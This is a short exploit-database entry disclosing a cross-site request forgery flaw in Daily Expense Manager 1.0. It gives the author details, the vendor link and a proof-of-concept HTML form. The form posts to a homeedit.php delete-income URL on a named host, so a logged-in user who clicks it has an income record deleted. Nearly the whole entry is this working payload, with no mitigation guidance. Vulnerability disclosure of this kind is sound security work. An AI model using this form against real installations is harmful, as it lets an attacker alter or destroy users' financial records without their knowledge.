Share
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)  
# Exploit Author: Mr Winst0n  
# Author E-mail: manamtabeshekan@gmail.com  
# Discovery Date: August 8, 2019  
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/  
# Tested Version: 1.0  
# Tested on: Parrot OS  
  
  
# PoC:  
  
<html>  
<body>  
<form action="http://expense.adminspoint.com/homeedit.php?delincome=778" method="post">  
<input type="submit" value="Click!" />  
</form>  
</body>  
</html>